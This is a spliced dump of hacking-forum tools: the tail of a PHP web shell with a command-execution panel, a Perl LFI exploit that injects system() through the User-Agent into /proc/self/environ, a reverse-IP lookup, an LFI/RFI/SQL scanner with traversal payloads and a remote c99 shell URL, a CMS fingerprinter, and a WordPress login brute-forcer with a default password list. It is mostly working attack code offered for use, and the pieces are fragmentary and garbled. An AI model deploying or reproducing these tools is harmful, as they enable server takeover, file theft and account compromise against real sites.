echo $head.$formp.$nowaddress.'<p align="center"><textarea rows="19" name="evalsource" cols="87"></textarea><br><input type=submit value="  eXecute  "></form></p>'.$end;exit;
}
if($_GET['do']=="info"){
if(ini_get('safe_mode')){
$safe_modes="On";
}else{
$safe_modes="Off";
}
if(ini_get('disable_functions')){
$disablef=ini_get('disable_functions');
}else{
$disablef="All Functions Enable";
}
if(ini_get('register_globals')){
$registerg="Enable";
}else{
$registerg="disable";
}
if(extension_loaded('curl')){
$curls="Enable";
}else{
$curls="disable";
}
if(@function_exists('mysql_connect')){
$db_on = "Mysql : On";
};
if(@function_exists('mssql_connect')){
$db_on = "Mssql : On";
};
if(@function_exists('pg_connect')){
$db_on = "PostgreSQL : On";
};if(@function_exists('ocilogon')){
$db_on = "Oracle : On";
};

echo $head."<font face='Tahoma' size='2'>Operating System : ".php_uname()."<br>Server Name : ".$_SERVER['HTTP_HOST']."<br>Disable_Functions : ".$disablef."<br>Safe_Mode : ".$safe_modes."<br>Openbase_dir : ".ini_get('openbase_dir')."<br>Php Version : ".phpversion()."<br>Free Space : ".sizee(disk_free_space("/"))."<br>Total Space : ".sizee(disk_total_space("/"))."<br>Register_Globals : ".$registerg."<br>Curl : ".$curls."<br>Database ".$db_on."<br>Server Name : ".$_SERVER['HTTP_HOST']."<br>Admin Server : ".$_SERVER['SERVER_ADMIN'].$end;
exit;
}
if ($_GET['do']=="cmd"){
echo $head.'
<form method=get action="'.$me.'">
<p align="center">
<textarea rows="19" name="S1" cols="87">';if (strlen($_GET['command'])>1 && $_GET['execmethod']!="popen"){
echo $_GET['execmethod']($_GET['command']);}
if (strlen($_GET['command'])>1 && $_GET['execmethod']=="popen"){
popen($_GET['command'],"r");}

echo'</textarea></p><p align="center">
<input type=hidden name="do" size="50" value="cmd"> <input type="text" name="command" size="50"><select name=execmethod>
  <option value="system">System</option>  <option value="exec">Exec</option>  <option value="passthru">Passthru</option><option value="popen">popen</option>
</select><input type="submit" value="eXecute">
</p></form>'.$end;exit;}
if($_GET['do']=="db"){
echo $head;sqlclienT();echo $end;
exit;
}
if($_REQUEST['file2ch'] && $_REQUEST['chmodnow']){
$chmodnum2=$_REQUEST['chmodnow'];
chmod($_REQUEST['file2ch'],"0".$chmodnum2);
}
if($_GET['do']=="chmod"){
echo $head.$formg.$nowaddress."<p align=center><b>Chmod</b><br><input size=50 name=file2ch value='".$_REQUEST['address'].$_REQUEST['filename']."'> To  <input name=chmodnow size=1 value=777><br><input type=submit value=Set></form>".$end;exit;

}
if($_GET['do']=="edit"){
if($_GET['filename']=="dir"){
if(is_readable($_GET['address'].$_GET['filew'])){
chdir($_GET['address'].$_GET['filew']);}else{echo $deny;exit;}

}}
$araddresss=explode($slash,getcwd());
$matharrayy=count($araddresss)-1;
$addr1backk=str_replace($araddresss[$matharrayy],"",$araddresss);
for($countback=0;$countback<count($addr1backk);$countback++){
$arraybacke[$countback]=$slash.$addr1backk[$countback];
$backdirunixx=$backdirunixx.$slash.$addr1backk[$countback];
}
if ($slash=="\\"){
$countback=null;
$backdirwin=null;
for($countback=1;$countback<count($addr1backk);$countback++){
$backdirwin=$backdirwin."\\".$addr1backk[$countback];}
$backdirwin=$addr1backk[0].$backdirwin;
$backaddresss=$backdirwin;
}else{
$countback=null;
$backdirwin=null;
for($countback=1;$countback<count($addr1backk);$countback++){
$backdirwin=$backdirwin."/".$addr1backk[$countback];}
$backdirwin=$addr1backk[0].$backdirwin;
$backaddresss=$backdirwin;
var_dump($backaddresss);
$backaddresss=str_replace("\\","/",$backaddresss);
}
function calc_dir_size($path)
{
$size = 0;
if ($handle = opendir($path))
{
while (false !== ($entry = readdir($handle)))
{
$current_path = $path . '/' . $entry;
if ($entry != '.' && $entry != '..' && !is_link($current_path))
{
if (is_file($current_path))
$size += filesize($current_path);
elseif (is_dir($current_path))
$size = calc_dir_size($current_path);
}
}
}
closedir($handle);
return $size;
}
if ($_GET['address']){$ifget=$_GET['address'];}if($_POST['address']){$ifget=$_POST['address'];}
if($cwd==''){$cwd=getcwd();}$nowaddress='<input type=hidden name=address value="'.$cwd.'">';
$ad=getcwd();
$hand=opendir("$ad");
while (false !== ($fileee = readdir($hand))) {
        if ($fileee != "." && $fileee != "..") {
		if (filetype($fileee)=="dir"){
$fil=$fil.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?do=edit&address='.$cwd.$slash.'&filename=dir&filew='.$fileee.'">'.$fileee.'</span></td>
<td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($fileee)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=chmod&address='.$cwd.$slash.'&filename='.$fileee.'">'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=rename&address='.$cwd.$slash.'&filename='.$fileee.'">Ren</a></td>
<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=delete&type=dir&address='.$cwd.$slash.'&filename='.$fileee.'">Del</a></td></tr></table>'
;}
else{
$file=$file.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?do=edit&address='.$cwd.$slash.'&filename='.$fileee.'">'.$fileee.'</span></td>
<td valign="top" height="19" width="80"><font face="Tahoma" style="font-size: 9pt">'.sizee(filesize($fileee)).'</td><td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($fileee)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=chmod&address='.$cwd.$slash.'&filename='.$fileee.'">'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=edit&address='.$cwd.$slash.'&filename='.$fileee.'">Edit</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=rename&address='.$cwd.$slash.'&filename='.$fileee.'">Ren</a></td>
<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=delete&type=file&address='.$cwd.$slash.'&filename='.$fileee.'">Del</a></td></tr></table>'
;}
}
}
echo $head.'
<font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.$backaddresss.'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
</tr></table>'.$fil.$file.'</table>
<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formg.'Change Directory</font></td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().'><input type=submit value="Go"></form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt; font-weight:700">Upload ---&gt; &nbsp;</td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
<font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee >
<input type=submit value=Upload /><br>'.$ifupload.'</form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Chmod ----&gt;</b>&nbsp;&nbsp;File : </td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt"><form method=post action=/now2.php><input size=55 name=chmode>&nbsp;&nbsp;Permission : <input name=chmodnum value=777 size=3> <input type=submit value=" Ok "></form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Create Dir ----&gt;</b> Dirctory Name </td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt">
<input name=cdirname size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Create File ----&gt;</b> Name File </td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt"><input name=cfilename size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
<td width="200" align="right" valign="top">
<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Copy ----&gt;</b></b>&nbsp;&nbsp;File : </td>
<td width="750"><font face="Tahoma" style="font-size: 10pt">
<input size=40 name=copyname> To Directory <input size=40 name=cpyto> <input type=submit value =Copy></form></td></tr></table>
<hr></td></tr></tbody></table></div></td></tr><tr><td bgcolor="#c6c6c6">
<p style="margin-top: 0pt; margin-bottom: 0pt" align="center">
<span lang="en-us"><font face="Tahoma" size="1">Coded by Amin Shokohi (Pejvak)<br><a href="http://www.itsecteam.com" target="_blank"><font size=1>iTSecTeam.com</a></font></span></td></tr></tbody></table></div></body></html>';

#!/usr/bin/perl -w
use strict;
use LWP 5.64;
use LWP::UserAgent;
my $browser = LWP::UserAgent->new;
my $url = $ARGV[0];
my ($line,$response);
$url .= "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ";
print "Perintah : ";
while( $line = <STDIN>) {
         chop($line);
         $browser->agent("bash<?system(\"$line 2> /dev/stdout\");?>bash");
         $response = $browser->get( $url );
         if ($response->content =~ /bash(.*)bash/s) {
                 print $1;
         }
         print "Command: ";
 }

echo ”Reversing IP: ”.$_POST['ip'].”<Br>”;
flush();
sleep(1);

$host = ”www.ip-adress.com”;
$query = ”/reverse_ip/”.$_POST['ip'];

$sock = fsockopen($host,”80″,$errno,$errstr,30);
if ($sock) {
$get  = ”GET ”.$query.” HTTP/1.1\r\n”.
“Host: ”.$host.”\r\n”.
“Accept: */*\r\n”.
“User-Agent: HNFox/5.0\r\n”.
“Connection: Close\r\n\r\n”;
fputs($sock,$get);
while (!feof($sock)) {
$output .= trim(fgets($sock, 3600)).”\n”;
}
fclose($sock);
}
else{
echo ”Failed! Gak bisa konek ke ip-adress.com!”;
exit();
}

$browsing = explode(“\n”,$output);
$c = 1;
foreach($browsing as $i => $v){
if(eregi(‘id=”hostcount”‘,$v)){
echo ”Host Found: ”.strip_tags($v).”<Br>”;
}
if(eregi(‘class=”odd”‘,$v) || eregi(‘class=”even”‘,$v)){
$key = $i+3;
echo $c.”. ”.strip_tags($browsing[$key]).”<Br>”;
$c++;
}
flush();
sleep(1);
}
echo ”7Reversing Done!”;

endif;

exit();

?>

}   else { main(); }

function main(){
echo ’LFI, RFI, SQL - Scanner
<form action=”" method=”post”>
Site to test: <input name=”scan” type=”text” />
<input type=”submit” name=”searchn” value=”Scan”/>
</form>’;
$link = $_POST['scan'];
preg_match(‘@^(?:http://)?([^/]+)@i’,$link, $matches);
$host = $matches[1];

function getLinks($link) {
$ret = array();
$dom = new domDocument;
@$dom->loadHTML(file_get_contents($link));
$dom->preserveWhiteSpace = false;
$links = $dom->getElementsByTagName(‘a’);
foreach ($links as $tag)
{
$ret[$tag->getAttribute('href')] = $tag->childNodes->item(0)->nodeValue;
}
return $ret;
}
if (isset($_POST["searchn"])) {
echo ’<form action=”lfi.php?do=selected” method=”post”>’;
echo ”<br>Links found: <ol>”;
if (preg_match(“/=/”, $link)) {
echo ’<input name=”sites[]“ type=”checkbox” id=”sites[]“ value=”‘.$link.’”>’.$link.’<br>’;
}
$urls = getLinks($link);
if(sizeof($urls) > 0)
{
foreach($urls as $key=>$value)
{
if (preg_match(“/=/i”, $key)) {
if (preg_match(“/.com|.net|.org|.co.uk|.com.au|.us/”, $key)) {
echo ’<input name=”sites[]“ type=”checkbox” id=”sites[]“ value=”‘.$key.’”>’.$key.’<br>’;
}
else{
echo ’<input name=”sites[]“ type=”checkbox” id=”sites[]“ value=”‘.$host.’/’.$key.’”>’.$host.’/’.$key.’<br>’;
}
}
}
echo ”</ol>”;
}
else
{
echo ”</ol>”;
echo ”No exploitable links found at $link<br><br>”;
}
echo ”<input type=’submit’ value=’Scan Sites’></form>”;
}
}

function selected(){
echo ’<form action=”lfi.php?do=scantime” method=”post”>’;
$sites = $_POST['sites'];
$n = count($sites);
$i = 0;
$r = 1;
echo ”Testing..” .
“<ol>”;
while ($i < $n)
{
$site = ”{$sites[$i]}”;
$equals = strrpos($site,”=”);
$siteedit = substr_replace($site, ”, $equals+1);
echo ”<br />$r. $siteedit<br />”;
rfi($siteedit);
lfi($siteedit);
sql($siteedit);
$i++;
$r++;
}
echo ”</ol>”;
echo ”<a href=’lfi.php’>Test again</a>”;
}

function lfi($site) {
$lfifound = 0;
$lfi = array(
“/etc/passwd”,
“../etc/passwd”,
“../../etc/passwd”,
“../../../etc/passwd”,
“../../../../etc/passwd”,
“../../../../../etc/passwd”,
“../../../../../../etc/passwd”,
“../../../../../../../etc/passwd”,
“../../../../../../../../etc/passwd”,
“../../../../../../../../../etc/passwd”,
“../../../../../../../../../../etc/passwd”,
“../../../../../../../../../../../etc/passwd”,
“../../../../../../../../../../../../etc/passwd”,
“../../../../../../../../../../../../../etc/passwd”,
“../../../../../../../../../../../../../../etc/passwd”,
“../../../../../../../../../../../../../../../etc/passwd”,
“/etc/passwd%00″,
“../etc/passwd%00″,
“../../etc/passwd%00″,
“../../../etc/passwd%00″,
“../../../../etc/passwd%00″,
“../../../../../etc/passwd%00″,
“../../../../../../etc/passwd%00″,
“../../../../../../../etc/passwd%00″,
“../../../../../../../../etc/passwd%00″,
“../../../../../../../../../etc/passwd%00″,
“../../../../../../../../../../etc/passwd%00″,
“../../../../../../../../../../../etc/passwd%00″,
“../../../../../../../../../../../../etc/passwd%00″,
“../../../../../../../../../../../../../etc/passwd%00″,
“../../../../../../../../../../../../../../etc/passwd%00″,
“../../../../../../../../../../../../../../../etc/passwd%00″,
“/proc/self/environ”,
“../proc/self/environ”,
“../../proc/self/environ”,
“../../../proc/self/environ”,
“../../../../proc/self/environ”,
“../../../../../proc/self/environ”,
“../../../../../../proc/self/environ”,
“../../../../../../../proc/self/environ”,
“../../../../../../../../proc/self/environ”,
“../../../../../../../../../proc/self/environ”,
“../../../../../../../../../../proc/self/environ”,
“/../../../../../../../../../../../proc/self/environ”,
“../../../../../../../../../../../../proc/self/environ”,
“../../../../../../../../../../../../../proc/self/environ”,
“../../../../../../../../../../../../../../proc/self/environ”,
“../../../../../../../../../../../../../../../proc/self/environ”,
“/proc/self/environ%00″,
“../proc/self/environ%00″,
“../../proc/self/environ%00″,
“../../../proc/self/environ%00″,
“../../../../proc/self/environ%00″,
“../../../../../proc/self/environ%00″,
“../../../../../../proc/self/environ%00″,
“../../../../../../../proc/self/environ%00″,
“../../../../../../../../proc/self/environ%00″,
“../../../../../../../../../proc/self/environ%00″,
“../../../../../../../../../../proc/self/environ%00″,
“/../../../../../../../../../../../proc/self/environ%00″,
“../../../../../../../../../../../../proc/self/environ%00″,
“../../../../../../../../../../../../../proc/self/environ%00″,
“../../../../../../../../../../../../../../proc/self/environ%00″,
“../../../../../../../../../../../../../../../proc/self/environ%00″
);

$totallfi = count($lfi);
for($i=0; $i<$totallfi; $i++)
{
$GET = @file_get_contents(“$site$lfi[$i]“);
if (preg_match(“/root/i”,$GET, $matches))  {
echo ”LFI found: $site$lfi[$i]<br>”;
$lfifound = 1;
}
}
if ($lfifound == 0) {
echo ”No LFI found.<br>”;
}
}

function rfi($site) {
$rfifound = 0;
$rfi = ”http://www.evilc0der.com/c99.txt?”;
$GET1 = @file_get_contents(“$site$rfi”);
if (preg_match(“/root/i”,$GET1, $matches))  {
echo ”RFI found: $site$rfi<br>”;
$rfifound = 1;
}
if ($rfifound == 0) {
echo ”No RFI found.<br>”;
}
}

function sql($site) {
$sqlfound = 0;
$sql = ”99′”;
$GET2 = @file_get_contents(“$site$sql”);
if (preg_match(“/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i”,$GET2, $matches))  {
echo ”SQL var: $site$sql<br>”;
$sqlfound = 1;
}
if ($sqlfound == 0) {
echo ”Sql Yok.<br>”;
}
}
?>
</html>

<?php
echo '
     <center>
	 <form action="" method="post">
	 <textarea name="siteler" style="height: 204px; width: 571px"></textarea>
	 <br><input type="submit" value="bul bakalım">
	 </center>
	 ';

$siteler        =  $_POST["siteler"];
$smf            =  'Powered by SMF';
$joomla         =  'Joomla!';
$vbulletin      =  'Powered by vBulletin';

if(! $siteler =='')
{

$curl           =  curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
$explode        =  explode("\n",$siteler);
foreach ($explode as $ver)
{
$trim           = trim($ver);
curl_setopt($curl,CURLOPT_URL,$trim);
$hayde          =curl_exec($curl);

     if (eregi ($smf,$hayde))
     {
     ob_flush();
     flush();
     usleep(100000);
     echo '<center><font color="red"><b>smf bulundu : '.$trim.'</font></center>';
     }

     elseif (eregi ($joomla,$hayde))
     {
     ob_flush();
     flush();
     usleep(100000);
     echo '<center><font color="blue"><b>joomla bulundu : '.$trim.'</font></center>';
     }

     elseif (eregi ($vbulletin,$hayde))
     {
     ob_flush();
     flush();
     usleep(100000);
     echo '<center><font color="green"><b>vbulletin bulundu : '.$trim.'</font></center>';
     }
}
}
echo '<center>coded by burtay</center>';
?>

Zone Kaydı: http://golgeler.net/view-%3E6537

http://img339.imageshack.us/img339/284/37826253.gif

WordPress Brute Force Toplu deneyici.Script izleyicinin kodlamış olduğu wordpress brute forcenin değişik bir versiyonudur Turkblackhats.com üyeleri için paylaşılmıştır.Her hakkı Turkblackhats.com a aittir.Kalitenin adresi turkblackhats.com

<?php
echo "
<!--
Wordpress Admin Panel Penetration Testing
V 1
PS: this tool is for penetration testing and educational purpose, turkblackhats.com is not responsible at any bad using for this tool.

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
-->
";

error_reporting(0);
set_time_limit(0);
ignore_user_abort(true);
?>
<html>
<head>
<title>Turkblackhats.com | WordPress Admin Panel Penetration Testing</title>
<meta http-equiv=Content-Type content=text/html; charset=utf-8 charset=UTF-8>

<style type="text/css">
body {
	color: white;
	background-image: url(http://t1.gstatic.com/images?q=tbn:ANd9GcRQa5CloHyQPcJ7ghTVn0VlylyAvRnVArdDmu2f98SSS7U92rRX);
}
textarea {
	border-radius: 8px;
	color: white;
	background-color:black;
}
input[type=submit] , .submit{
		background-color:black;
		color:white;
		border-radius:8px;
}
p {
	font-size: 10px;
	text-align: center;
}
a:link,a:hover,a:visited {
	color:pink;
}
</style>
</head>
<!-- turkblackhats.com | WordPress Admin Panel Penetration Testing -->
<center>
<p><a href="http://www.turkblackhats.com" target="_blank"><img src="http://2.bp.blogspot.com/_gnm2C1B8vbI/RtsXECxw5iI/AAAAAAAAAsM/PwfxmL8l7pM/s400/black_hat.jpg" border="0"/></a></p>
<form enctype="multipart/form-data" method="POST">
  <table width='624' border='0' id='Box'>
    <tr>
<td width='4%'>&nbsp;</td>
<td width="96%" colspan="3" align="center" ><p>turkblackhats.com | WordPress Admin Panel Penetration Testing </p></td>
</tr>
    <tr>
      <td >&nbsp;</td>
      <td ><p>Hosts:</p></td>
      <td ><p> Users:</p></td>
      <td ><p>Passwords:</p></td>
    </tr>
    <tr>
      <td>&nbsp;</td>
      <td ><textarea name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST['hosts'];} ?></textarea></td>
      <td ><textarea name="usernames" cols="30" rows="10"  ><?php if($_POST){echo $_POST['usernames'];}else {echo "admin";} ?></textarea></td>
      <td ><textarea name="passwords" cols="30" rows="10"  ><?php if($_POST){echo $_POST['passwords'];}else {echo "admin\nadministrator\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#$%^\n!@#$%^&*(\n(*&^%$#@!\n111111\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999";} ?></textarea></td>
    </tr>
<tr><td colspan="4"><input type="submit" name="submit" value="Brute Now"  />
<?php
if($_POST)
{
	$hosts = trim(filter($_POST['hosts']));
	$passwords = trim(filter($_POST['passwords']));
	$usernames = trim(filter($_POST['usernames']));

	if($passwords && $usernames && $hosts)
	{
		$hosts_explode = explode("\n", $hosts);
		$usernames_explode = explode("\n", $usernames);
    	$passwords_explode = explode("\n", $passwords);

		foreach($hosts_explode as $host)
		{
			$host = RemoveLastSlash($host);
			$hacked = 0;
			$host = str_replace(array("http://","https://","www."),"",trim($host));
			$host = "http://".$host;
			$wpAdmin = $host.'/wp-admin/';

			if(!url_exists($host."/wp-login.php"))
			{echo "<p>".$host." => <font color='red'>Error In Login Page !</font></p>";ob_flush();flush();continue;}

			foreach($usernames_explode as $username)
			{
				foreach($passwords_explode as $password)
				{
					$ch   =     curl_init();
					curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
					curl_setopt($ch,CURLOPT_URL,$host.'/wp-login.php');
					curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
					curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
					curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
					curl_setopt($ch,CURLOPT_POST,TRUE);
					curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=Giri‏"."&redirect_to=".$wpAdmin."&testcookie=1");
					$login    =	   curl_exec($ch);

					if(eregi ("profile.php",$login) )
					{
						$hacked = 1;
						echo "<p>".$host." => UserName : [<font color='green'>".$username."</font>] : Password : [<font color='green'>".$password."</font>]</p>";
						ob_flush();flush();break;
					}
				}
				if($hacked == 1){break;}
			}
			if($hacked == 0)
			{echo "<p>".$host." => <font color='red'>Failed !</font></p>";ob_flush();flush();}
		}
	}
	else {echo "<p><font color='red'>All fields are Required ! </font></p>";}
}
?>
</td></tr>
</table></form>

<!-- Turkblackhats.com | WordPress Admin Panel Penetration Testing -->
<p>powered by <a href="http://turkblackhats.com">turkblackhats.com</a></p>
</center>
<p>
  <?php
function url_exists($strURL)
{
    $resURL = curl_init();
    curl_setopt($resURL, CURLOPT_URL, $strURL);
    curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);
    curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback');
    curl_setopt($resURL, CURLOPT_FAILONERROR, 1);
    curl_exec ($resURL);
    $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);
    curl_close ($resURL);
    if ($intReturnCode != 200){return false;}
	else{return true ;}
}
function filter($string)
{
	if(get_magic_quotes_gpc() != 0){return stripslashes($string);	}
	else{return $string;	}
}
function RemoveLastSlash($host)
{
	if(strrpos($host, '/', -1) == strlen($host)-1)
	{return substr($host,0,strrpos($host, '/', -1));}
	else{return $host;}
}
?>
<?php  echo "</p>"; ?>

İzleyici